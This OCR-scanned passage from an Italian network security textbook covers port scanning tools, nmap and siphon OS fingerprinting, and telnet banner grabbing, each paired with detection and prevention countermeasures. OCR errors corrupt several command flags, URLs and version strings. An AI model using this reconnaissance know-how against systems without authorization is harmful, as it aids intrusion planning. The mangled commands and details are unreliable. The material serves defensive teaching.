sione di porte UDP di tipo grafico, affidabile e piuttosto brioso (a seconda dell’im- 
postazione dei ritardi), anche se è in grado di analizzare un solo host alla volta per 
porte sequenzialmente specificate. È uno strumento solido per scansioni UDP velo- 
ci di host singoli, come mostra la Figura 2.5. 


e E ICAZA i 
Sumo T_ supp FS 
Detey, mac [750 __ 


Figura 2.5 
WUPS smaschera un sistema che utilizza SNMP (UDP 161). 


ScanLine 


Per quanto riguarda i programmi di scansione delle porte basati completamente su 
Windows, probabilmente ScanLine di Foundstone è il programma di questo tipo 
più veloce e robusto. Esso presenta moltissime opzioni, ma una di quelle maggior- 
mente apprezzabili è la capacità di analizzare intervalli molto ampi e di effettuare in 


Scansione 5I 


una sola sessione la scansione sia delle porte TCP, sia di quelle UDP. Osservate 
l'esempio seguente: 


C:\nt\attacker>sl -t 21,22,23,25 -u 53,137,138 192.168.0.1 
ScanLine (TM) 1.01 

Copyright (c) Foundstone, Inc. 2002 
http://www.foundstone.com 


Scan of 1 IP started at Fri Nov 22 23:09:34 2002 


192.168.0.1 

Responded in 0 ms. 

1 hop away 

Responds with ICMP unreachable: No 
TCP ports: 21 23 

UDP ports: 


Scan finished at Fri Nov 22 23:09:46 2002 


1 IP and 7 ports scanned in @ hours @ mins 12.07 secs 


Sintesi della scansione delle porte 


La Tabella 2.2 presenta un elenco degli strumenti di scansione delle porte maggior- 
mente diffusi e per ciascuno riporta i tipi di scansione supportati. 


Tabella 2.2 Alcunidegli strumenti di scansione più comuni 


Scanner TCP UDP Camuffamento Fonte 

UNIX 

strobe X I TSPTA N Apr Urali 
FreeBSD/ports/distfiles/ 
strobe-1.06.tgz 

tep_scan X http://wwdsilx.wwdsi.com/saint/ 

udp_scan x http://wwdsilx.wwdsi.com/saint/ 

nmap x X x http://www. inscure.org/nmap 

netcat x X http://packetstorm.securify. 
com/UNIX/utilities/nc110.tgz 

Windows 

netcat X È; http://ww.atstake.com/ 
research/tools/nciint.zip 

NetScanTools X x http://ww.nwpsw.com 

Pro 2000 

SuperScan X http://members.home.com/rke - 
ir/software.html 

WinScan X http://www.prosolve.com 

ipEye xX http://ntsecurity.nu 

WUPS X http://ntsecurity.nu 

Fscan Xx X http://ww.foundstone.com/ 


* Attenzione: la scansione netcat UDP non funziona mai sotto NT, quindi non fate affidamento su 
di essa. 
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Contromisure alla scansione delle porte 
Intercettazione 


La scansione delle porte è spesso utilizzata dagli hacker per stabilire quali porte 
TCP e UDP siano in ascolto sui sistemi remoti. Riconoscere attività di questo tipo è 
essenziale per prevedere quando e da chi potrà arrivare un attacco. I principali me- 
todi utilizzati per l’intercettazione di tentativi di scansione delle porte sono pro- 
grammi di IDS basati sulla rete. 

Snort (http://ww.snort.org) è un ottimo IDS, soprattutto perché le signature 
sono spesso messe a disposizione da autori pubblici ed è gratuito. Come avrete 
probabilmente intuito, questo è uno dei nostri programmi preferiti e rende possibile 
un efficace sistema di intercettazione delle intrusioni (NIDS). Si noti che le versioni 
1.x di Snort non gestiscono correttamente la frammentazione dei pacchetti. Riportia- 
mo a titolo di esempio il listato di un tentativo di scansione di porte: 


[**] spp_portscan: PORTSCAN DETECTED from 192.168.1.10 [**] 

05/22-18:48:53.681227 

[**] spp_portscan: portscan status from 192.168.1.10: 4 connections across 
1 hosts: TCP(@), UDP(4) [**] 

05/22-18:49:14.180505 

[**] spp _portscan: End of portscan from 192.168.1.10 [**] 

05/22-18:49:34,180236 


Per quanto riguarda gli host UNIX, esistono diversi strumenti, come scanlogd 
(http://ww.openwall.com/scanlogd/) di Solar Designer, in grado di riconoscere 
e registrare questi tipi di attacco, Inoltre, Psionic PortSentry, un componente del 
progetto Abacus (http://www.psionic.com/abacus/), può essere configurato in 
modo da riconoscere e rispondere a un attacco attivo, Un metodo per rispondere a 
un tentativo di scansione delle porte è impostare automaticamente regole di filtrag- 
gio a livello di kernel che aggiungono una regola che nega l’accesso dal sistema in- 
criminato. Tale regola può essere configurata nel file di configurazione di PortSen- 
try e sarà diversa da sistema a sistema. Per un sistema Linux 2.2.x dotato di suppor- 
to per firewall a livello del kernel, la voce corrispondente del file portsentry. conf 
ha l'aspetto seguente: 


# New ipchain support for Linux kernel version 2.102+ 
KILL_ROUTE="/Sbin/ipchains -I input -s $TARGET$ -j DENY -1" 


PortSentry è compatibile con le principali varianti di UNIX, compreso Solaris. È im- 
portante ricordare che l’intercettazione di sequenze di scansione delle porte prove- 
nienti da un particolare sistema o rete potrebbe indicare che qualcuno sta perlu- 
strando la vostra rete. Prestate molta attenzione a questo tipo di attività, poiché po- 
trebbe essere imminente un attacco in grande stile. Infine, ricordate che ci sono 
svantaggi nel reagire attivamente o bloccare i tentativi di scansione delle porte. La 
ragione principale è che l’hacker potrebbe presentarsi sotto mentite spoglie utiliz- 
zando l'indirizzo IP di utenti ignari, che diverrebbero pertanto l’obiettivo delle vo- 
stre rappresaglie. Per ulteriori informazioni e suggerimenti su come programmare e 
portare un attacco contro i sistemi di intercettazione dei programmi di scansione, 
consultare il saggio realizzato da Solar Designer e disponibile all'indirizzo http: 
I /ww.openwall.com/scanlogd/P53-13.gz. 
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La maggior parte dei firewall può e dovrebbe essere configurata in modo da ricono- 
scere i tentativi di scansione. Alcuni riescono a intercettare le scansioni “contraffat- 
te” meglio di altri. Per esempio, molti firewall prevedono esplicitamente opzioni per 
il riconoscimento delle scansioni di tipo SYN, mentre ignorano del tutto quelle di 
tipo FIN. La parte più complessa dell’intercettazione delle scansioni sulle porte è 
certamente l’analisi dei file di log; per effettuare questa operazione vi consigliamo 
Psionic LogSentry (http://www.psionic.com/abacus/). Il nostro consiglio è confi- 
gurare il sistema in modo che gli avvisi partano in tempo reale via e-mail. Se possi- 
bile, utilizzate il bresbold logging (registrazione con soglia), in modo che nessuno 
possa effettuare un attacco di tipo Denial of Service inondando la vostra posta elet- 
tronica. Con il threshold logging, gli avvisi verranno raggruppati, anziché inviare un 
avviso per ogni intercettazione di una possibile sonda. Come minima precauzione, 
dovreste attivare meccanismi di reporting delle anomalie che segnalino i tentativi di 
scansione delle porte del sito. Lance Spitzner (http://www.enteract.com/-lspitz 
fintrusion.html) ha sviluppato per Firewall-1 un pratico strumento di nome 
alert.sh, che è in grado di intercettare e controllare le scansioni sulle porte tramite 
Firewall-1 e viene eseguito come User Defined Alert. 

Nel mondo Windows NT esistono un paio di utility in grado di intercettare i tipi di 
scansione più semplici. Il primo strumento è Genius 2.0 di Independent Software 
(Genius 3.2.2 è disponibile all'indirizzo http://www. indiesoft.com/) che funzio- 
na in ambiente Windows 95/98 e Windows NT/2000. Questo prodotto offre molto 
più di un semplice monitoraggio della scansione delle porte TCP, ma questa sola 
funzionalità giustifica pienamente la sua presenza nella nostra barra delle applica- 
zioni. Genius si pone in ascolto delle richieste di apertura di diverse porte in un cer- 
to periodo e avverte l’utente con una finestra di dialogo quando riconosce una 
Scansione, restituendo l’indirizzo IP e il nome DNS dell’intruso (come mostrato nel- 
la figura seguente). 


@ Portscan 


Le funzionalità di riconoscimento delle scansioni sulle porte di Genius si estendono 
alle tradizionali scansioni con connessioni TCP e a quelle di tipo SYN. 

Infine, ZoneAlarm (http://ww.zonelabs.com/) è un prodotto eccellente che for- 
nisce funzionalità firewall e IDS per la piattaforma Windows. ZoneAlarm è fornito 
gratuitamente per utilizzo personale. 


Prevenzione 


Se da un lato è difficile impedire a qualcuno di lanciare una scansione delle porte 
dei vostri sistemi, dall'altro è possibile ridurre al minimo i rischi disattivando tutti i 
servizi non strettamente necessari. In ambiente UNIX, è sufficiente trasformare in 
commento i servizi non necessari in /etc/inetd.conf e disattivare quelli attivati 
all’interno degli script di avvio. Per ulteriori informazioni, si veda il Capitolo 7. 

Anche nel caso di Windows è opportuno disattivare tutti i servizi non necessari. In 
questo caso l'operazione risulta più complessa a causa del funzionamento di Win- 
dows, poiché la porta 139 svolge la maggior parte delle funzioni. Alcuni dei servizi, 
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tuttavia, possono essere disattivati dal Pannello di controllo, alla voce Servizi. | rischi 
e le contromisure per sistemi Windows NT sono presentati nel Capitolo 5. Inoltre, 
Tiny Software (ww.tinysoftware.com) fornisce un eccellente modulo di kernel per 
il filtro dei pacchetti per Windows, che consente di proteggere molte porte essenziali. 
Per altri sistemi operativi o dispositivi, vi rimandiamo al manuale utente per scopri- 
re come ridurre al minimo il numero di porte in ascolto. 


Individuazione del sistema operativo 


Come abbiamo precedentemente illustrato, sono disponibili numerosi strumenti e 
tecniche per la scansione delle porte. Ricorderete che il nostro obiettivo primario 
nella scansione delle porte era identificare quali porte TCP e UDP fossero in ascolto 
sul sistema bersaglio. Il secondo obiettivo è stabilire il tipo di sistema operativo sot- 
toposto a scansione, 


Rilevamento attivo del sistema operativo 


Diffusione: 10 
Semplicità: 8 
Impatto: 4 
Fattore di rischio: 7 


Alcune informazioni sul sistema operativo risulteranno utili nella fase di ricostruzio- 
ne della mappa dei punti deboli, descritta nei prossimi capitoli. È importante ricor- 
dare che stiamo cercando di identificare con la massima precisione possibile i punti 
deboli dei sistemi bersaglio, e che per questo è fondamentale riconoscere corretta- 
mente il sistema operativo di cui ci dobbiamo occupare. Si può partire da semplici 
tecniche di cattura dei banner, presentate nel Capitolo 3, in grado di raccogliere le 
informazioni da servizi come FTP, telnet, SMTP, HTTP, POP e altri. Questo è sicu- 
ramente il metodo più semplice per riconoscere il sistema operativo e le versioni 
dei servizi in esecuzione. Ovviamente, esistono diversi strumenti in grado di aiutarci 
in questa attività. Due dei più precisi sono il versatile nmap e queso, entrambi in gra- 
do di offrire funzionalità di fingerprinting dello stack. 


Fingerprinting attivo dello stack 


Prima di passare all'utilizzo di nmap e queso, è importante spiegare cosa si intenda 
esattamente per fingerprinting dello stack. Si tratta di una tecnologia estremamente 
potente che consente di identificare con grande precisione e velocità il sistema ope- 
rativo di ogni host. Sostanzialmente, le diverse implementazioni dello stack IP diffe- 
riscono per piccoli dettagli, legati alla diversa interpretazione delle direttive RFC da 
parte degli sviluppatori durante la realizzazione dello stack TCP/IP, Questo permet- 
te di riconoscere con una certa sicurezza il sistema operativo utilizzato, sulla base di 
queste differenze. Per dare risultati significativi, il fingerprinting dello stack necessi- 
ta generalmente di almeno una porta in ascolto. In caso contrario, nmap potrà solo 
formulare alcune ipotesi, con prevedibili problemi di affidabilità del risultato. L'arti- 
colo di riferimento su questo tema, pubblicato inizialmente da Phrack Magazine, è 
stato scritto da Fyodor e si trova all'indirizzo http://ww.insecure.org/nmap/ 
nmap-fingerprinting-article.html. 
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Vediamo quali tipi di tecniche possono contribuire a distinguere un sistema operati- 
vo dall'altro. 


e Probe FIN (sonda FIN). Questa tecnica prevede l’invio di un pacchetto 
FIN su una porta aperta scelta come obiettivo. Come già detto, secondo la 
RFC 793, quando un pacchetto FIN viene ricevuto da una porta aperta il 
comportamento corretto è non rispondere; tuttavia, molte implementazioni 
dello stack (tra cui Windows NT) rispondono con FIN/ACK. 


e Bogus flag probe (sonda con flag falso). Quando si invia un pacchetto 
SYN nella cui intestazione sia attivato un flag TCP non definito, alcuni siste- 
mi operativi, come Linux, rispondono lasciando impostato tale flag nel pac- 
chetto di risposta. 

e Campionamento ISN (Initial Sequence Number). L'ipotesi è di riuscire 
a riconoscere uno schema nella sequenza iniziale utilizzata dalla specifica 
implementazione di TCP in risposta a una richiesta di connessione. 

e Monitoraggio del bit “don’t fragment”, Alcuni sistemi operativi imposta- 
no il bit di inibizione della frammentazione (“don't fragment bit”) allo scopo 
di migliorare le prestazioni. Questo bit può essere controllato per determi- 
nare il tipo di sistema operativo che presenta questo comportamento. 


e Dimensione della finestra iniziale "TCP. Si controlla la dimensione della 
finestra iniziale sui pacchetti restituiti. In certe implementazioni, questa di- 
mensione è univoca e può contribuire notevolmente alla precisione del 
profilo ricostruito. 

e Valore ACK. Il valore di sequenza utilizzato per il campo ACK varia a se- 
conda dell’implementazione di IP: in certi casi viene restituito il numero di 
sequenza inviato, in altri il numero incrementato di un'unità. 

e Riduzione dei messaggi di errore ICMP. Alcuni sistemi operativi seguo- 
no la RFC 1812 (mw.ietf.org/rfc/rfc1812.txt), limitando la frequenza 
di invio dei messaggi d'errore. Inviando una serie di pacchetti UDP a una 
porta alta a caso si possono contare i messaggi “unreachable” che ritornano 
in un certo periodo. 


e Citazione dei messaggi ICMP. I sistemi operativi si distinguono anche per 
la quantità di informazioni riprese in caso di errori ICMP. L'esame del mes- 
saggio citato può contribuire all’identificazione del sistema operativo target. 

o Integrità dei messaggi di errore ICMP restituiti. Alcune implementazio- 
ni modificano le intestazioni IP dei messaggi di errore restituiti. È possibile 
distinguere il sistema operativo in base al tipo di cambiamenti apportati 
all’intestazione. 

e Tipodiservizio. Si esamina il TOS per messaggi di tipo “ICMP port unrea- 
chable” (porta ICMP non raggiungibile). Nella maggior parte delle imple- 
mentazioni viene utilizzato 0, ma non sempre. 


e Gestione della frammentazione. Come hanno evidenziato Thomas Pta- 
cek e Tim Newsham nel loro storico articolo /nsertion, Evasion, and Denial 
of Service: Eluding Network Intrusion Detection (http://ww.clark.net 
/-roesch/idspaper.htm1l), le varie implementazioni dello stack gestiscono 
in modo diverso la sovrapposizione dei frammenti. Alcuni stack sovrascri- 
vono i vecchi dati con i nuovi e viceversa al riassemblaggio dei frammenti. 
L'esame del modo in cui vengono riordinati i pacchetti sonda può contri- 
buire all’identificazione del sistema operativo bersaglio. 
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e Opzioni TCP. Le opzioni TCP sono state definite dalla RFC 793 e più recen- 
temente dalla RFC 1323 (mw.ietf.org/rfc/rfc1323.txt). Le opzioni più 
avanzate definite nella RFC 1323 sono tendenzialmente implementate nelle 
versioni più recenti dello stack. L'invio di pacchetti con diverse di queste 
opzioni impostate, come nessuna operazione, la dimensione massima del 
segmento, il fattore di scala della finestra e la data/ora, può contribuire 
all’identificazione del sistema operativo preso di mira. 


nmap supporta tutte queste tecniche (con l'eccezione della gestione della frammen- 
tazione e della riduzione dei messaggi di errore ICMP) attraverso l’opzione -0. Esa- 
miniamo la nostra rete bersaglio: 


[tsunami] nmap -0 192.168.1.10 
Starting nmap V. 2.53 by fyodor@insecure.org 
Interesting ports on shadow (192.168.1.10): 


Port State Protocol Service 
7 open tcp echo 

9 open top discard 
13 open tcp daytime 
19 open tcp chargen 
21 open tcp ftp 

22 open tcp ssh 

23 open tcp telnet 
25 open top smtp 

37 open tep , time 
111 open tcp sunrpc 
512 open top exec 
513 open top login 
514 open tcp shell 
2049 open tcp nfs 
4045 open tcp lockd 


TCP Sequence Prediction: Class=random positive increments 
Difficulty=26590 (Worthy challenge) 
Remote operating system guess: Solaris 2.5, 2.51 


Con l'opzione di fingerprint dello stack di nmap, è facile identificare il sistema ope- 
rativo bersaglio con una certa precisione. Anche in assenza di porte aperte, nmap è 
in grado di formulare un'ipotesi sulla base dei pochi elementi disponibili: 


[tsunami]# nmap -p80 -0 10.10.10.10 

Starting nmap V. 2.53 by fyodor@insecure.org 

Warning: No ports found open on this machine, 0S detection will be MUCH 
less reliable 

No ports open for host (10.10.10.10) 


Remote 0S guesses: Linux 2.09.27 - 2.90.30, Linux 2.0.32-34, Linux 2.0.35-36, 
Linux 2.1.24 PowerPC, Linux 2.1.76, Linux 2.1.91 - 2.1.103, 

Linux 2.1.122 - 2.1.132; 2.2.0-prei - 2.2.2, Linux 2.2.0-pre6 - 2.2.2-ac5 
Nmap run completed -- 1 IP address (1 host up) scanned in 1 second 


Come si vede, anche in mancanza di porte aperte, nmap è riuscito a identificare cor- 
rettamente il sistema operativo preso di mira, Linux. 
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Una delle caratteristiche più interessanti di nmap è che l'elenco delle caratteristiche 
distintive dei sistemi operativi è contenuto nel file nmap-0s-fingerprints. A ogni 
release di nmap, a questo file vengono aggiunte nuove informazioni. In questo mo- 
mento, il file contiene centinaia di elementi. Se desiderate contribuire all’utilità di 
nmap aggiungendo una nuova informazione, potete visitare l'indirizzo http://www. 
insecure.org:80/cgi-bin/nmap-submit.cgi. 

Attualmente nmap sembra essere lo strumento più preciso per l'identificazione tra- 
mite TCP, ma non è il primo programma a implementare le tecniche viste in prece- 
denza. queso, disponibile per il download all’indirizzo http://packetstormsecurity 
.com/UNIX/scanners/queso-980922,tar.gz, è uno strumento di riconoscimento 
dei sistemi operativi che è stato rilasciato prima che Fyodor incorporasse in nmap 
questa funzionalità. È importante osservare che queso non utilizza la scansione del- 
le porte e si limita al riconoscimento del sistema operativo sulla base di un'unica 
porta aperta (normalmente la 80). Se sul sistema target la porta 80 è chiusa, è neces- 
sario specificarne una aperta, come mostrato nel prossimo esempio, in cui queso 
viene utilizzato per individuare un sistema operativo attraverso la porta 25: 


[tsunami] queso 10.10.10.20:25 
10.10.10.20:25 * Windoze 95/98/NT 


Contromisure al riconoscimento del sistema operativo 
Intercettazione 


Molti degli strumenti per l’intercettazione della scansione delle porte permettono 
anche di controllare i tentativi di identificazione del sistema operativo. Pur non indi- 
cando esplicitamente il verificarsi di scansioni da parte di nmap o queso, questi pro- 
grammi sono in grado di intercettare scansioni in base a opzioni specifiche, come 
l'impostazione del flag SYN. 


Prevenzione 


Sarebbe bello se esistesse una contromisura semplice per il riconoscimento del si- 
stema operativo, ma il problema è piuttosto complesso. È possibile modificare il co- 
dice sorgente o qualche parametro del sistema operativo in modo da alterare la cor- 
rispondenza con uno dei profili univoci dello stack, ma questo potrebbe pregiudi- 
care il funzionamento della macchina. Per esempio, FreeBSD 4.x supporta l'opzio- 
ne di kernel TCP_DROP_SYNFIN, adottata per ignorare un pacchetto SYN+FIN uti- 
lizzato da nmap per eseguire il fingerprinting dello stack. L'abilitazione di questa op- 
zione può contribuire a ostacolare l’identificazione del sistema operativo, ma inter- 
rompe il supporto per RFC 1644 (Estensioni TCP per le transazioni). 

Piuttosto, riteniamo che le scansioni da Internet dovrebbero riguardare unicamente 
proxy e firewall sicuri e affidabili. Pensiamo che proteggersi nascondendosi non sia 
una strategia di difesa solida. Anche se un hacker dovesse scoprire il sistema opera- 
tivo, è comunque necessario impedirgli in ogni modo di accedervi. 
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1) Identificazione passiva del sistema operativo 
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Abbiamo dimostrato l’efficacia del fingerprinting dello stack attivo utilizzando stru- 
menti quali nmap e queso. È importante ricordare che le tecniche di riconoscimento 
del fingerprinting dello stack citate in precedenza sono di tipo attivo per loro natu- 
ra. È stata effettuata la scelta di inviare pacchetti a tutti i sistemi, per individuare de- 
bolezze specifiche dello stack di rete e quindi risalire al sistema operativo utilizzato. 
Avendo inviato i pacchetti al sistema target, per un sistema IDS per reti è relativa- 
mente semplice intercettare un tentativo di riconoscimento del sistema operativo di 
questo tipo, In altre parole, non è uno degli strumenti più discreti disponibili. 


Fingerprinting passivo dello stack 


Il concetto di fingerprinting passivo dello stack è analogo a quello attivo, solo che inve- 
ce di inviare pacchetti al sistema target l'hacker determina il tipo di sistema operativo 
utilizzato esaminando passivamente il traffico di rete: i sistemi operativi presenti in rete 
vengono dunque riconosciuti attraverso l'osservazione del traffico dei diversi sistemi. 
Lance Spitzner ha eseguito un numero elevato di ricerche in quest'area e i risultati sono 
stati raccolti in un saggio disponibile all'indirizzo http://project.honeynet.org; inol- 
tre, Marshall Beddoe e Chris Abad hanno sviluppato siphon, uno strumento per l’iden- 
tificazione passiva del sistema operativo e la ricostruzione della mappa delle porte. Ve- 
diamo il funzionamento del fingerprinting passivo dello stack. 


Impronte passive 


Esistono diverse impronte (signatures) che possono essere utilizzate per identificare 

un sistema operativo, tuttavia limiteremo la nostra discussione ad alcuni attributi as- 

sociati a una sessione TCP/IP. 

e TTI (Time To Live). Qual è il valore impostato per la proprietà TTL dei 
pacchetti in uscita? 

e Dimensione della finestra. Qual è il valore impostato per la dimensione 
della finestra? 

e Bit DF (Dont Fragment). Il sistema operativo imposta il bit “don't frag- 
ment”? 

Analizzando passivamente ogni singolo attributo e confrontando i risultati con quel- 

li contenuti in un database di attributi conosciuto, è possibile risalire al sistema ope- 

rativo remoto. Questo metodo non permette di ottenere sempre la risposta corretta, 

ma è possibile combinare tra loro gli attributi per generare risultati sufficientemente 

affidabili. La tecnica descritta è esattamente ciò che siphon è in grado di eseguire. 

Vediamo un esempio pratico. Se eseguiamo il telnet dal sistema shadow 

(192.168.1.10) a quake (192.168.1.11), possiamo identificare in modo passivo il si- 

stema operativo utilizzando siphon: 


{[shadow]# telnet 192.168.1.11 
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Utilizzando il nostro sniffer preferito, Snort, possiamo esaminare il percorso parziale 
dei pacchetti della connessione telnet: 


06/04-11:23:48.297976 192.168.1.11:23 -> 192,168.1.10:2295 

TCP TTL:255 TOS:0x0 ID:58934 DF 

**S***A* Seq: 0xD3B709A4 Ack: 0xBE09B2B7 Win: 0x2798 

TCP Options => NOP NOP TS: 9688775 9682347 NOP WS: 0 MSS: 1460 


Esaminando i tre attributi TCP/IP, possiamo ricavare le informazioni seguenti: 
e TIL=255; 

e Dimensione della finestra = 2798; 

e BitDF=Sì. 

Ora, esaminiamo il file del database fingerprint siphon, osprints.conf: 


[shadow]# grep -i solaris osprints.conf 
# Window:TTL:DF:Operating System DF = 1 for ON, Q for OFF. 


2328:255:1:Solaris 2.6 - 2.7 
2238:255:1:Solaris 2.6 - 2.7 
2400:255:1:Solaris 2.6 Lot 
2798:255:1:Solaris 2.6 - 2.7 
FE88:255:1:;Solaris 2.6 - 2.7 
87C00:255:1:Solaris 2.6 - 2.7 
FAF0:255:0:Solaris 2.6 - 2.7 
FFFF:255:1:Solaris 2.6 - 2.7 


Possiamo vedere che il quarto elemento dispone degli stessi attributi ricavati con 
Snort. Dimensione della finestra pari a 2798, TTL pari a 255 e bit DF impostato 
(uguale a 1), Pertanto, anche utilizzando siphon dovremmo essere in grado di risa- 
lire con precisione al sistema operativo del target dell'attacco: 


[crush]# siphon -v -i x10 -o fingerprint.out 

Running on: 'crush' running FreeBSD 4.0-RELEASE on a(n) i386 
Using Device: x1@ 

Host Port TTL DF Operating System 
192.168.1.11 23 255 ON Solaris 2.6 - 2.7 


Come potete vedere, siamo stati in grado di risalire al sistema operativo, che in que- 
sto caso è Solaris 2.6, con relativa facilità. È importante sottolineare che è stato pos- 
sibile formulare un'ipotesi senza inviare un solo pacchetto a 192.168.1.11. 

Il fingerprinting passivo può essere utilizzato da un hacker per mappare una poten- 
ziale vittima semplicemente navigando il suo sito Web e analizzando il tracciato 
della rete oppure utilizzando uno strumento come siphon. Questa tecnica è estre- 
mamente efficace ma presenta alcuni limiti. In primo luogo, le applicazioni che co- 
struiscono i propri pacchetti (per esempio, nmap) non utilizzano la stessa impronta 
del sistema operativo, pertanto i risultati potrebbero non essere precisi. In secondo 
luogo, un host remoto può facilmente modificare gli attributi della connessione: 


Solaris: ndd -set /dev/ip ip _def_ttl 'number' 
Linux: echo 'number' > /proc/sys/net/ipv4/ip_default_tt1l 
NT: HKEY_ LOCAL _MACHINE\System\CurrentControlSet\Services\Tcpip\Parameter 
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vst | 
© Contromisure passive 
al riconoscimento del sistema operativo 


Si vedano le contromisure di prevenzione descritte nel paragrafo “Contromisure al 
riconoscimento del sistema operativo”, sempre in questo stesso capitolo. 


Tutto in uno: strumenti di analisi automatica 
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Sono disponibili molti altri strumenti di analisi delle reti e ne vengono sviluppati di 
nuovi quotidianamente. È impossibile elencarli tutti, ma ci teniamo a segnalarne 
due che possono contribuire significativamente al vostro arsenale. 

Cheops (http://ww.marko.net/cheops/), visibile nella Figura 2.6, è uno strumen- 
to grafico che è stato progettato per essere un tool completo per la mappatura delle 
reti. Cheops integra funzionalità come la scansione via ping, traceroute e sulle por- 
te e il riconoscimento del sistema operativo (con queso) in un solo pacchetto. 
Cheops offre una semplice interfaccia che rappresenta graficamente i sistemi e le reti 
correlate, semplificando la comprensione del contesto che si deve affrontare. 
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Figura 2.6 
Cheops riunisce una serie di strumenti per la mappatura delle reti in un unico pacchetto grafico. 
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Tkined fa parte di Scotty (http://wwwhome.cs.utwente.nl/-schoenw/scotty/) ed 
è un editor di rete scritto in Tcl in cui sono integrati diversi strumenti di gestione della 
rete che permettono l’analisi delle reti IP. 

Tkined è un sistema espandibile e consente di effettuare operazioni di perlustrazione 
delle reti rappresentando i risultati in forma grafica. Pur non arrivando al riconosci- 
mento dei sistemi operativi, è in grado di svolgere la maggior parte delle attività viste 
in questo e nel precedente capitolo. Il pacchetto Scotty contiene numerosi altri script 
di analisi degni di nota. 


Contromisure agli strumenti di analisi automatica 


Strumenti come Scotty, Tkined e Cheops utilizzano una qualche combinazione del- 
le tecniche già descritte in questo capitolo, quindi i rimedi per intercettare questi 
tipi di attacco sono identici a quelli illustrati in precedenza. 
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Capitolo 3 
Enumerazione 


L’aggressore dopo essere riuscito a identificare gli host attivi e i servizi in esecuzio- 
ne mediante le tecniche illustrate nel Capitolo 2, generalmente passerà in rassegna i 
servizi individuati, alla ricerca di punti deboli conosciuti. Tale processo viene chia- 
mato enumerazione. 

La differenza principale tra le tecniche di raccolta delle informazioni prese finora in 
esame e l'enumerazione è il livello di invadenza: l'enumerazione richiede connes- 
sioni dirette ai sistemi e interrogazioni esplicite e potrebbe (dovrebbe!) quindi esse- 
re registrata o notata in qualche modo. Vedremo come riconoscere e fermare attivi- 
tà di questo genere (se possibile). 

A prima vista, molte delle informazioni raccolte con l’enumerazione possono 
sembrare del tutto innocue. Tuttavia i dati che trapelano dalle falle dei vostri si- 
stemi potrebbero essere la vostra rovina, come cercheremo di dimostrare in que- 
sto capitolo. In genere, le informazioni che gli aggressori cercano di acquisire 
tramite l'enumerazione comprendono i nomi degli account utente (tale informa- 
zione verrà poi trasmessa ai successivi attacchi per l’identificazione delle pass- 
word), risorse condivise spesso configurate in modo errato (per esempio, condi- 
visioni file prive di protezione) e versioni del software non recenti con vulnerabi- 
lità note (per esempio, server Web sensibili a buffer overflow remoto). General- 
mente, una volta che l’intruso enumera un nome utente valido o una condivisio- 
ne, riuscire a compromettere il sistema in oggetto è solo una questione di tempo. 
Chiudere queste falle è semplice e permette di eliminare il principale appiglio 
per gli hacker. 

Le tecniche di enumerazione sono fortemente legate al sistema operativo e vengo- 
no quindi applicate in base alle informazioni raccolte nel Capitolo 2 (scansione 
delle porte e riconoscimento del sistema operativo). In effetti, le funzionalità di 
scansione delle porte ed enumerazione sono spesso combinate nello stesso tool, 
come avete visto nel Capitolo 2 a proposito di programmi quali SuperScan, che è 
in grado di effettuare la scansione di una rete alla ricerca di porte aperte e contem- 
poraneamente catturare banner identificati rimanendo in ascolto. In questo capi- 
tolo per prima cosa parleremo brevemente della cattura dei banner, la tecnica di 
enumerazione più generica, per poi passare all'analisi di meccanismi più specifici 
di una determinata piattaforma che possono richiedere l’impiego di tool maggior- 
mente specializzati. 

Prenderemo in esame i servizi procedendo in ordine numerico, in base al numero 
della porta (TCP o UDP) su cui essi sono tradizionalmente in ascolto; per esempio, 
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parleremo prima della TCP 25 (SMTP), poi della UDP 69 (TFTP), in seguito della 
TCP 79 (finger) e così via. Questo capitolo non si propone di analizzare tutte le tec- 
niche di enumerazione esistenti contro tutte le 65.535 porte TCP e UDP; ci occupe- 
remo unicamente di quei servizi che tradizionalmente hanno fornito la maggior 
quantità di informazioni sui sistemi bersaglio, in base alla nostra esperienza profes- 
sionale di esperti di sicurezza informatica. Confidiamo che queste informazioni con- 
tribuiscano a chiarire il modo in cui l’enumerazione viene realizzata, per ottenere 
una conoscenza superiore del sistema bersaglio, aiutando così l'aggressore a fare 
progressi verso l’obiettivo principale: ottenere l’accesso non autorizzato al sistema 


stesso. 


Nel corso di questo capitolo, utilizzeremo i termini “famiglia NT” per indi- 
care tutti i sistemi basati sulla piattaforma “New Technology” (NT) di Mi- 
crosoft: Window NT 3.x-4.x, Windows 2000, Windows XP e Windows .NET 
Server. Ove necessario, distingueremo tra le versioni per desktop e quelle per 
server. Di contro, designeremo collettivamente i sistemi DOS/Windows 
1.Xx/3.x/9x/Me di Microsoft come “famiglia DOS". 


Nozioni elementari sulla cattura dei banner 


La più semplice delle tecniche di enumerazione è costituita dalla cattura dei banner, 
a cui abbiamo accennato nel Capitolo 2. La cattura dei banner può essere definita 
semplicemente come la connessione ad applicazioni remote per l'osservazione 
dell'output. Essa può rivelarsi sorprendentemente ricca di informazioni per l’aggres- 
sore. Quanto meno, costui riuscirà a identificare la marca e il modello del servizio in 
esecuzione, il che in molti casi sarà sufficiente a mettere in moto il processo di ricer- 
ca delle vulnerabilità. 

Come si è già rilevato nel Capitolo 2, molti tool di scansione delle porte sono in gra- 
do di effettuare la cattura dei banner mentre svolgono contemporaneamente la loro 
funzione principale, l’identificazione delle porte aperte (il segno premonitore di un 
servizio vulnerabile). In questo paragrafo classificheremo brevemente le tecniche 
manuali maggiormente diffuse di cattura dei banner, che qualsiasi aggressore che si 
rispetti deve conoscere (a prescindere dal crescente grado di automatizzazione de- 
gli scanner delle porte). 


CO) Strumenti elementari per la cattura 
dei banner: telnet e netcat 
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Tradizionalmente, il meccanismo manuale collaudato per l’enumerazione dei 
banner e delle informazioni sulle applicazioni è stato basato su telnet (un tool 
per le comunicazioni remote incorporato nella maggior parte dei sistemi ope- 
rativi). L'utilizzo di telnet per la cattura dei banner è molto semplice: è suffi- 
ciente aprire una connessione telnet con una porta nota situata sul server 
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obiettivo, premere alcune volte Invio, se necessario, e analizzare le informazioni 
di ritorno: 


C:\>telnet www.corleone.com 80 
HTTP/1.0 400 Bad Request 
Server: Netscape-Commerce/1.12 


Your browser sent a non-HTTP compliant message. 


Questa è una tecnica generica che funziona con molte applicazioni comuni che 
rispondono su una porta predefinita, quale la porta HTTP 80, la SMTP 25, o la 
PIP 21. 

Se si vuole utilizzare uno strumento notevolmente più preciso per effettuare questi 
sondaggi, si può fare affidamento sul “coltellino svizzero multiuso per il TCP/IP” 
chiamato netcat, scritto da Hobbit (hobbit@atstake.com) e importato nella famiglia 
Windows NT (comprendente Windows NT e Windows 2000, XP e .NET Server) da 
